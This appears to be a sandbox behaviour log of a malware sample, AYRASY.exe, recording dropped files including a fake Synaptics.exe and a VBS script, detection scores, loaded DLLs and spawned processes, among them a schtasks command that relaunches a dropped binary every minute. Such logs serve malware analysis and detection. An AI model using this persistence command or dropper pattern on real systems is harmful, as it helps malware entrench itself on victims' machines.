Source: C:\Users\user\Desktop\AYRASY.exe | File created: C:\Users\user\Desktop\._cache_AYRASY.exe
Source: C:\ProgramData\Synaptics\Synaptics.exe | Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3556:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5048
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | File created: C:\Users\user\AppData\Local\Temp\WBHUSK.vbs
Source: Yara match | File source: AYRASY.exe, type: SAMPLE
Source: Yara match | File source: 0.0.AYRASY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\ProgramData\Synaptics\RCX4413.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs
Source: C:\Users\user\Desktop\AYRASY.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Synaptics\Synaptics.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
Source: C:\Users\user\Desktop\AYRASY.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\AYRASY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AYRASY.exe | ReversingLabs: Detection: 92%
Source: AYRASY.exe | Virustotal: Detection: 87%
Source: C:\Users\user\Desktop\AYRASY.exe | File read: C:\Users\user\Desktop\AYRASY.exe
Source: unknown | Process created: C:\Users\user\Desktop\AYRASY.exe "C:\Users\user\Desktop\AYRASY.exe"
Source: C:\Users\user\Desktop\AYRASY.exe | Process created: C:\Users\user\Desktop\._cache_AYRASY.exe "C:\Users\user\Desktop\._cache_AYRASY.exe"
Source: C:\Users\user\Desktop\AYRASY.exe | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
Source: unknown | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 3548
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: twext.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: shacct.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: idstore.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: samlib.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: starttiledata.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: acppage.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: sfc.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: msi.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: aepic.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: wlidprov.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: provsvc.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\AYRASY.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Section loaded: cscapi.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: apphelp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: version.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: wininet.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: wsock32.dll
